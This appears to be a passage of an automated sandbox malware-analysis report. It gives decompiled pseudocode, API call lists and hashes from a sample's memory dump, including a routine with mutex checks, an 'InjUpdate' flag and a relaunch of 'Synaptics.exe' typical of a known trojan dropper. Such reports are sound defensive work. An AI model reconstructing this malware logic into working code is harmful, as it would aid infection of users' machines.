                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ad2174255326ac0a5e8adcf355344906cc0e0926d4dd3e2aaec39b383c119ffd
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 90518E70A013549BEB20EB6ACC41B9A77F9AF09308F10457EE845E73D2DB38AD45CB59
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 361 401b60-401b6b 362 401b71-401b86 361->362 363 401c3d-401c3f 361->363 364 401b92-401bb1 LocalFree 362->364 365 401b88-401b8d RtlEnterCriticalSection 362->365 366 401bc5-401bcb 364->366 365->364 367 401bb3-401bc3 VirtualFree 366->367 368 401bcd-401bf2 call 401460 * 3 366->368 367->366 375 401bf4-401c09 LocalFree 368->375 376 401c0b-401c1f 368->376 375->375 375->376 378 401c21-401c26 RtlLeaveCriticalSection 376->378 379 401c2b-401c35 RtlDeleteCriticalSection 376->379 378->379
                                                                                                                                                                                                                            C-Code - Quality: 72%
                                                                                                                                                                                                                            			E00401B60() {
                                                                                                                                                                                                                            				void* _t2;
                                                                                                                                                                                                                            				void* _t3;
                                                                                                                                                                                                                            				void* _t14;
                                                                                                                                                                                                                            				intOrPtr* _t19;
                                                                                                                                                                                                                            				intOrPtr _t23;
                                                                                                                                                                                                                            				intOrPtr _t26;
                                                                                                                                                                                                                            				intOrPtr _t28;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t26 = _t28;
                                                                                                                                                                                                                            				if( *0x49e5c4 == 0) {
                                                                                                                                                                                                                            					return _t2;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_push(_t26);
                                                                                                                                                                                                                            					_push(E00401C36);
                                                                                                                                                                                                                            					_push( *[fs:edx]);
                                                                                                                                                                                                                            					 *[fs:edx] = _t28;
                                                                                                                                                                                                                            					if( *0x49e04d != 0) {
                                                                                                                                                                                                                            						_push(0x49e5cc);
                                                                                                                                                                                                                            						L004013F8();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					 *0x49e5c4 = 0;
                                                                                                                                                                                                                            					_t3 =  *0x49e624; // 0x0
                                                                                                                                                                                                                            					LocalFree(_t3);
                                                                                                                                                                                                                            					 *0x49e624 = 0;
                                                                                                                                                                                                                            					_t19 =  *0x49e5ec; // 0x49e5ec
                                                                                                                                                                                                                            					while(_t19 != 0x49e5ec) {
                                                                                                                                                                                                                            						_t1 = _t19 + 8; // 0x0
                                                                                                                                                                                                                            						VirtualFree( *_t1, 0, 0x8000); // executed
                                                                                                                                                                                                                            						_t19 =  *_t19;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					E00401460(0x49e5ec);
                                                                                                                                                                                                                            					E00401460(0x49e5fc);
                                                                                                                                                                                                                            					E00401460(0x49e628);
                                                                                                                                                                                                                            					_t14 =  *0x49e5e4; // 0x0
                                                                                                                                                                                                                            					while(_t14 != 0) {
                                                                                                                                                                                                                            						 *0x49e5e4 =  *_t14;
                                                                                                                                                                                                                            						LocalFree(_t14);
                                                                                                                                                                                                                            						_t14 =  *0x49e5e4; // 0x0
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_pop(_t23);
                                                                                                                                                                                                                            					 *[fs:eax] = _t23;
                                                                                                                                                                                                                            					_push(0x401c3d);
                                                                                                                                                                                                                            					if( *0x49e04d != 0) {
                                                                                                                                                                                                                            						_push(0x49e5cc);
                                                                                                                                                                                                                            						L00401400();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_push(0x49e5cc);
                                                                                                                                                                                                                            					L00401408();
                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • RtlEnterCriticalSection.KERNEL32(Function_0009E5CC,00000000,00401C36), ref: 00401B8D
                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00401C36), ref: 00401B9F
                                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401C36), ref: 00401BBE
                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401C36), ref: 00401BFD
                                                                                                                                                                                                                            • RtlLeaveCriticalSection.KERNEL32(Function_0009E5CC,00401C3D,00000000,00000000,00401C36), ref: 00401C26
                                                                                                                                                                                                                            • RtlDeleteCriticalSection.KERNEL32(Function_0009E5CC,00401C3D,00000000,00000000,00401C36), ref: 00401C30
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                                                                                                                                            • String ID: (I$I
                                                                                                                                                                                                                            • API String ID: 3782394904-2351459270
                                                                                                                                                                                                                            • Opcode ID: 9f8810575637edab4c47e499dd9e800e95505fd11f6ffcb64adb6a0ff56ad0c0
                                                                                                                                                                                                                            • Instruction ID: 63aebc4cd3b04fdf267fff4595653c8a60232739778a968a80e4263db5fe1b04
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f8810575637edab4c47e499dd9e800e95505fd11f6ffcb64adb6a0ff56ad0c0
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D111AC706042407EEB21EBA79D55B163BD8A71571CF91407BF004A62F2E67CAC00CB2E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 51%
                                                                                                                                                                                                                            			E0049A3E0(intOrPtr __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __fp0) {
                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                            				intOrPtr _t27;
                                                                                                                                                                                                                            				void* _t29;
                                                                                                                                                                                                                            				void* _t31;
                                                                                                                                                                                                                            				intOrPtr _t32;
                                                                                                                                                                                                                            				char _t33;
                                                                                                                                                                                                                            				intOrPtr _t38;
                                                                                                                                                                                                                            				void* _t39;
                                                                                                                                                                                                                            				void* _t48;
                                                                                                                                                                                                                            				intOrPtr _t49;
                                                                                                                                                                                                                            				intOrPtr _t51;
                                                                                                                                                                                                                            				intOrPtr _t53;
                                                                                                                                                                                                                            				intOrPtr _t55;
                                                                                                                                                                                                                            				intOrPtr _t57;
                                                                                                                                                                                                                            				intOrPtr _t59;
                                                                                                                                                                                                                            				intOrPtr _t61;
                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                            				intOrPtr _t69;
                                                                                                                                                                                                                            				intOrPtr _t73;
                                                                                                                                                                                                                            				void* _t83;
                                                                                                                                                                                                                            				void* _t86;
                                                                                                                                                                                                                            				intOrPtr _t92;
                                                                                                                                                                                                                            				void* _t97;
                                                                                                                                                                                                                            				void* _t98;
                                                                                                                                                                                                                            				intOrPtr _t103;
                                                                                                                                                                                                                            				intOrPtr _t127;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t137 = __fp0;
                                                                                                                                                                                                                            				_t124 = __esi;
                                                                                                                                                                                                                            				_t123 = __edi;
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(__ebx);
                                                                                                                                                                                                                            				_push(__esi);
                                                                                                                                                                                                                            				_t92 = __eax;
                                                                                                                                                                                                                            				_push(_t127);
                                                                                                                                                                                                                            				_push(0x49a5ef);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t127;
                                                                                                                                                                                                                            				if(__edx == 0) {
                                                                                                                                                                                                                            					E004967D4(__eax, __eax, "ControlCenter -> Pasif");
                                                                                                                                                                                                                            					__eflags = 0;
                                                                                                                                                                                                                            					E0049A098(_t92, _t92, 0, 0, __edi, __esi, __fp0, 0, 0, 0, 0, 0);
                                                                                                                                                                                                                            					L14:
                                                                                                                                                                                                                            					_pop(_t103);
                                                                                                                                                                                                                            					 *[fs:eax] = _t103;
                                                                                                                                                                                                                            					_push(0x49a5f6);
                                                                                                                                                                                                                            					return E004049E4( &_v20, 4);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				E004967D4(__eax, __eax, "ControlCenter -> Aktif");
                                                                                                                                                                                                                            				if( *((intOrPtr*)(_t92 + 0x308)) == 0) {
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t92 + 0x308)) = E0045C064(_t92, 1);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t27 =  *((intOrPtr*)(_t92 + 0x308));
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t27 + 0x44)) = _t92;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t27 + 0x40)) = 0x49a668;
                                                                                                                                                                                                                            				_t29 = E004738BC(0, _t92); // executed
                                                                                                                                                                                                                            				_t31 = E00441704(_t92);
                                                                                                                                                                                                                            				_t32 =  *0x49d6b8; // 0x0
                                                                                                                                                                                                                            				_t97 = _t29; // executed
                                                                                                                                                                                                                            				_t33 = E00477AD8(_t32, _t92, _t31, _t123, _t124); // executed
                                                                                                                                                                                                                            				 *0x49f149 = _t33;
                                                                                                                                                                                                                            				E00402B68(1,  &_v8);
                                                                                                                                                                                                                            				E00404DCC(_v8, "InjUpdate");
                                                                                                                                                                                                                            				if(0 != 0) {
                                                                                                                                                                                                                            					L8:
                                                                                                                                                                                                                            					_t38 =  *0x49d6b4; // 0x0, executed
                                                                                                                                                                                                                            					_t39 = E0047423C(_t38, _t92, 1, _t124, _t133); // executed
                                                                                                                                                                                                                            					if(_t39 != 0) {
                                                                                                                                                                                                                            						E0045A800();
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						E00498684(_t92, _t92, _t123, _t124); // executed
                                                                                                                                                                                                                            						E00498F04(_t92, _t123, _t124); // executed
                                                                                                                                                                                                                            						_t48 = E00498B40(_t92, _t92, _t123, _t124); // executed
                                                                                                                                                                                                                            						if(_t48 == 0) {
                                                                                                                                                                                                                            							_t49 =  *0x49f1b0; // 0x0
                                                                                                                                                                                                                            							_push(E00409780(_t49, _t97, 1, __eflags));
                                                                                                                                                                                                                            							_t51 =  *0x49f1b4; // 0x0
                                                                                                                                                                                                                            							_push(E00409780(_t51, _t97, 1, __eflags));
                                                                                                                                                                                                                            							_t53 =  *0x49f1b8; // 0x0
                                                                                                                                                                                                                            							_push(E00409780(_t53, _t97, 1, __eflags));
                                                                                                                                                                                                                            							_t55 =  *0x49f1bc; // 0x0
                                                                                                                                                                                                                            							_push(E00409780(_t55, _t97, 1, __eflags));
                                                                                                                                                                                                                            							_t57 =  *0x49f1c0; // 0x0
                                                                                                                                                                                                                            							_push(E00409780(_t57, _t97, 1, __eflags));
                                                                                                                                                                                                                            							_t59 =  *0x49f1a8; // 0x0
                                                                                                                                                                                                                            							_push(E00409780(_t59, _t97, 1, __eflags));
                                                                                                                                                                                                                            							_t61 =  *0x49f1a4; // 0x0
                                                                                                                                                                                                                            							_t62 = E00409780(_t61, _t97, 1, __eflags);
                                                                                                                                                                                                                            							_pop(_t98);
                                                                                                                                                                                                                            							E0049A098(_t92, _t92, _t98, _t62, _t123, _t124, _t137);
                                                                                                                                                                                                                            							E00499FAC(_t92, 1);
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							E00498998(_t92, _t92, 1, _t123, _t124); // executed
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					goto L14;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t69 =  *0x49d6b4; // 0x0
                                                                                                                                                                                                                            				_t124 = OpenMutexA(0x1f0001, 0, E00404E80(_t69));
                                                                                                                                                                                                                            				_t131 = _t124;
                                                                                                                                                                                                                            				if(_t124 == 0) {
                                                                                                                                                                                                                            					goto L8;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					goto L5;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                            					CloseHandle(_t124);
                                                                                                                                                                                                                            					_t73 =  *0x49d6b4; // 0x0
                                                                                                                                                                                                                            					_t124 = OpenMutexA(0x1f0001, 0, E00404E80(_t73));
                                                                                                                                                                                                                            					E004737B0( &_v12);
                                                                                                                                                                                                                            					_push( &_v12);
                                                                                                                                                                                                                            					E00402B68(0,  &_v20);
                                                                                                                                                                                                                            					E00409E18(_v20,  &_v16);
                                                                                                                                                                                                                            					_pop(_t83);
                                                                                                                                                                                                                            					E00404C88(_t83, _v16);
                                                                                                                                                                                                                            					_t86 = E00409A48(_v12, _t131);
                                                                                                                                                                                                                            					_t132 = _t86;
                                                                                                                                                                                                                            					if(_t86 != 0) {
                                                                                                                                                                                                                            						E00475A94("Synaptics.exe", _t92, _t123, _t124, _t132);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t133 = _t124;
                                                                                                                                                                                                                            				} while (_t124 != 0);
                                                                                                                                                                                                                            				goto L8;
                                                                                                                                                                                                                            			}


                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • OpenMutexA.KERNEL32 ref: 0049A48F
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,001F0001,00000000,00000000), ref: 0049A49B
                                                                                                                                                                                                                            • OpenMutexA.KERNEL32 ref: 0049A4B2
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: MutexOpen$CloseHandle
                                                                                                                                                                                                                            • String ID: ControlCenter -> Aktif$ControlCenter -> Pasif$InjUpdate$Synaptics.exe
                                                                                                                                                                                                                            • API String ID: 1942958553-1737343353
                                                                                                                                                                                                                            • Opcode ID: 698df5902b6dd65d62d8a088d3dc5d77190b0f7002f4ad2b0891d715899b60e5
                                                                                                                                                                                                                            • Instruction ID: 032596fc6928d1f920dd250c266260124ec275c25dbd90c6f41682d3cc039f83
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 698df5902b6dd65d62d8a088d3dc5d77190b0f7002f4ad2b0891d715899b60e5
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B5149716002009FDB00EF6ADC82A9A37A9AB54308B11457FF804EB393DA7DED19879D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                            			E004590AC(void* __ecx, char __edx) {
                                                                                                                                                                                                                            				char _v5;
                                                                                                                                                                                                                            				char _v261;
                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                            				intOrPtr _t39;
                                                                                                                                                                                                                            				intOrPtr _t42;
                                                                                                                                                                                                                            				intOrPtr _t43;
                                                                                                                                                                                                                            				struct HINSTANCE__** _t53;
                                                                                                                                                                                                                            				struct HICON__* _t55;
                                                                                                                                                                                                                            				intOrPtr _t58;
                                                                                                                                                                                                                            				struct HINSTANCE__** _t60;
                                                                                                                                                                                                                            				void* _t67;
                                                                                                                                                                                                                            				char* _t69;
                                                                                                                                                                                                                            				char* _t75;
                                                                                                                                                                                                                            				intOrPtr _t81;
                                                                                                                                                                                                                            				intOrPtr* _t88;
                                                                                                                                                                                                                            				intOrPtr* _t89;
                                                                                                                                                                                                                            				intOrPtr _t90;
                                                                                                                                                                                                                            				void* _t91;
                                                                                                                                                                                                                            				char _t93;
                                                                                                                                                                                                                            				void* _t104;
                                                                                                                                                                                                                            				void* _t105;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t93 = __edx;
                                                                                                                                                                                                                            				_t91 = __ecx;
                                                                                                                                                                                                                            				if(__edx != 0) {
                                                                                                                                                                                                                            					_t105 = _t105 + 0xfffffff0;
                                                                                                                                                                                                                            					_t39 = E00403F10(_t39, _t104);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_v5 = _t93;
                                                                                                                                                                                                                            				_t90 = _t39;
                                                                                                                                                                                                                            				E00421B3C(_t91, 0);
                                                                                                                                                                                                                            				_t42 =  *0x49dabc; // 0x49b520
                                                                                                                                                                                                                            				if( *((short*)(_t42 + 2)) == 0) {
                                                                                                                                                                                                                            					_t89 =  *0x49dabc; // 0x49b520
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t89 + 4)) = _t90;
                                                                                                                                                                                                                            					 *_t89 = 0x45a814;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t43 =  *0x49dc10; // 0x49b528
                                                                                                                                                                                                                            				if( *((short*)(_t43 + 2)) == 0) {
                                                                                                                                                                                                                            					_t88 =  *0x49dc10; // 0x49b528
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t88 + 4)) = _t90;
                                                                                                                                                                                                                            					 *_t88 = E0045AA0C;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				 *((char*)(_t90 + 0x34)) = 0;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t90 + 0x90)) = E00403BBC(1);
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t90 + 0xa8)) = E00403BBC(1);
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t90 + 0x60)) = 0;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t90 + 0x84)) = 0;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t90 + 0x5c)) = 0xff000018;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t90 + 0x78)) = 0x1f4;
                                                                                                                                                                                                                            				 *((char*)(_t90 + 0x7c)) = 1;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t90 + 0x80)) = 0;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t90 + 0x74)) = 0x9c4;
                                                                                                                                                                                                                            				 *((char*)(_t90 + 0x88)) = 0;
                                                                                                                                                                                                                            				 *((char*)(_t90 + 0x9d)) = 1;
                                                                                                                                                                                                                            				 *((char*)(_t90 + 0xb4)) = 1;
                                                                                                                                                                                                                            				_t103 = E0042B3F8(1);
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t90 + 0x98)) = _t52;
                                                                                                                                                                                                                            				_t53 =  *0x49d93c; // 0x49e030
                                                                                                                                                                                                                            				_t55 = LoadIconA( *_t53, "MAINICON"); // executed
                                                                                                                                                                                                                            				E0042B7C8(_t103, _t55);
                                                                                                                                                                                                                            				_t20 = _t90 + 0x98; // 0x736d
                                                                                                                                                                                                                            				_t58 =  *_t20;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t58 + 0x14)) = _t90;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t58 + 0x10)) = 0x45afac;
                                                                                                                                                                                                                            				_t60 =  *0x49d93c; // 0x49e030
                                                                                                                                                                                                                            				GetModuleFileNameA( *_t60,  &_v261, 0x100);
                                                                                                                                                                                                                            				OemToCharA( &_v261,  &_v261);
                                                                                                                                                                                                                            				_t67 = E0040E020(0x5c);
                                                                                                                                                                                                                            				if(_t67 != 0) {
                                                                                                                                                                                                                            					_t27 = _t67 + 1; // 0x1
                                                                                                                                                                                                                            					E00409FC4( &_v261, _t27);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t69 = E0040E048( &_v261, 0x2e);
                                                                                                                                                                                                                            				if(_t69 != 0) {
                                                                                                                                                                                                                            					 *_t69 = 0;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				CharLowerA( &(( &_v261)[1]));
                                                                                                                                                                                                                            				_t31 = _t90 + 0x8c; // 0x45150c
                                                                                                                                                                                                                            				E00404C30(_t31, 0x100,  &_v261);
                                                                                                                                                                                                                            				_t75 =  *0x49d6e4; // 0x49e038
                                                                                                                                                                                                                            				if( *_t75 == 0) {
                                                                                                                                                                                                                            					E004593B4(_t90, _t90, 0x100); // executed
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				 *((char*)(_t90 + 0x59)) = 1;
                                                                                                                                                                                                                            				 *((char*)(_t90 + 0x5a)) = 1;
                                                                                                                                                                                                                            				 *((char*)(_t90 + 0x5b)) = 1;
                                                                                                                                                                                                                            				 *((char*)(_t90 + 0x9e)) = 1;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t90 + 0xa0)) = 0;
                                                                                                                                                                                                                            				E0045B188(_t90, 0x100);
                                                                                                                                                                                                                            				E0045BB4C(_t90);
                                                                                                                                                                                                                            				_t81 = _t90;
                                                                                                                                                                                                                            				if(_v5 != 0) {
                                                                                                                                                                                                                            					E00403F68(_t81);
                                                                                                                                                                                                                            					_pop( *[fs:0x0]);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t90;
                                                                                                                                                                                                                            			}

























                                                                                                                                                                                                                            0x00459148
                                                                                                                                                                                                                            0x0045914e
                                                                                                                                                                                                                            0x00459154
                                                                                                                                                                                                                            0x0045915b
                                                                                                                                                                                                                            0x00459162
                                                                                                                                                                                                                            0x00459169
                                                                                                                                                                                                                            0x0045917c
                                                                                                                                                                                                                            0x0045917e
                                                                                                                                                                                                                            0x00459189
                                                                                                                                                                                                                            0x00459191
                                                                                                                                                                                                                            0x0045919a
                                                                                                                                                                                                                            0x0045919f
                                                                                                                                                                                                                            0x0045919f
                                                                                                                                                                                                                            0x004591a5
                                                                                                                                                                                                                            0x004591a8
                                                                                                                                                                                                                            0x004591bb
                                                                                                                                                                                                                            0x004591c3
                                                                                                                                                                                                                            0x004591d6
                                                                                                                                                                                                                            0x004591e3
                                                                                                                                                                                                                            0x004591ea
                                                                                                                                                                                                                            0x004591ec
                                                                                                                                                                                                                            0x004591f5
                                                                                                                                                                                                                            0x004591f5
                                                                                                                                                                                                                            0x00459202
                                                                                                                                                                                                                            0x00459209
                                                                                                                                                                                                                            0x0045920b
                                                                                                                                                                                                                            0x0045920b
                                                                                                                                                                                                                            0x00459216
                                                                                                                                                                                                                            0x0045921b
                                                                                                                                                                                                                            0x0045922c
                                                                                                                                                                                                                            0x00459231
                                                                                                                                                                                                                            0x00459239
                                                                                                                                                                                                                            0x0045923d
                                                                                                                                                                                                                            0x0045923d
                                                                                                                                                                                                                            0x00459242
                                                                                                                                                                                                                            0x00459246
                                                                                                                                                                                                                            0x0045924a
                                                                                                                                                                                                                            0x0045924e
                                                                                                                                                                                                                            0x00459257
                                                                                                                                                                                                                            0x0045925f
                                                                                                                                                                                                                            0x00459266
                                                                                                                                                                                                                            0x0045926b
                                                                                                                                                                                                                            0x00459271
                                                                                                                                                                                                                            0x00459273
                                                                                                                                                                                                                            0x00459278
                                                                                                                                                                                                                            0x0045927f
                                                                                                                                                                                                                            0x00459289

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • LoadIconA.USER32(00400000,MAINICON), ref: 00459191
                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,00446440,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 004591C3
                                                                                                                                                                                                                            • OemToCharA.USER32(?,?), ref: 004591D6
                                                                                                                                                                                                                            • CharLowerA.USER32(?,00400000,?,00000100,?,?,?,00446440,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 00459216
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Char$FileIconLoadLowerModuleName
                                                                                                                                                                                                                            • String ID: 0I$8I$MAINICON
                                                                                                                                                                                                                            • API String ID: 3935243913-3756263232
                                                                                                                                                                                                                            • Opcode ID: 6d8b1a9b1b3b0c8ce7000258a2abcab798a72233c8836065be33f0d47b441d7d
                                                                                                                                                                                                                            • Instruction ID: 5a9b49fbd3013c0ee8ebc8f701b73d14000c1e337c5d680fa8568d3dadbd01b2
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6d8b1a9b1b3b0c8ce7000258a2abcab798a72233c8836065be33f0d47b441d7d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E516170A042449FD740EF29C885B857BE4AB15308F4484FAEC48DF397DBBD9988CB69
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 571 401a9c-401abe RtlInitializeCriticalSection 572 401ac0-401ac5 RtlEnterCriticalSection 571->572 573 401aca-401b00 call 401460 * 3 LocalAlloc 571->573 572->573 580 401b31-401b45 573->580 581 401b02 573->581 585 401b51 580->585 586 401b47-401b4c RtlLeaveCriticalSection 580->586 583 401b07-401b19 581->583 583->583 584 401b1b-401b2a 583->584 584->580 586->585
                                                                                                                                                                                                                            C-Code - Quality: 68%
                                                                                                                                                                                                                            			E00401A9C() {
                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                            				signed int _t13;
                                                                                                                                                                                                                            				intOrPtr _t19;
                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                            				intOrPtr _t23;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_push(_t23);
                                                                                                                                                                                                                            				_push("\xef\xbf\xb				_push( *[fs:edx]);
                                                                                                                                                                                                                            				 *[fs:edx] = _t23;
                                                                                                                                                                                                                            				_push(0x49e5cc);
                                                                                                                                                                                                                            				L004013F0();
                                                                                                                                                                                                                            				if( *0x49e04d != 0) {
                                                                                                                                                                                                                            					_push(0x49e5cc);
                                                                                                                                                                                                                            					L004013F8();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				E00401460(0x49e5ec);
                                                                                                                                                                                                                            				E00401460(0x49e5fc);
                                                                                                                                                                                                                            				E00401460(0x49e628);
                                                                                                                                                                                                                            				_t11 = LocalAlloc(0, 0xff8); // executed
                                                                                                                                                                                                                            				 *0x49e624 = _t11;
                                                                                                                                                                                                                            				if( *0x49e624 != 0) {
                                                                                                                                                                                                                            					_t13 = 3;
                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                            						_t20 =  *0x49e624; // 0x0
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
                                                                                                                                                                                                                            						_t13 = _t13 + 1;
                                                                                                                                                                                                                            					} while (_t13 != 0x401);
                                                                                                                                                                                                                            					 *((intOrPtr*)(0x49e610)) = 0x49e60c;
                                                                                                                                                                                                                            					 *0x49e60c = 0x49e60c;
                                                                                                                                                                                                                            					 *0x49e618 = 0x49e60c;
                                                                                                                                                                                                                            					 *0x49e5c4 = 1;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t19);
                                                                                                                                                                                                                            				 *[fs:eax] = _t19;
                                                                                                                                                                                                                            				_push(E00401B59);
                                                                                                                                                                                                                            				if( *0x49e04d != 0) {
                                                                                                                                                                                                                            					_push(0x49e5cc);
                                                                                                                                                                                                                            					L00401400();
                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                            APIs
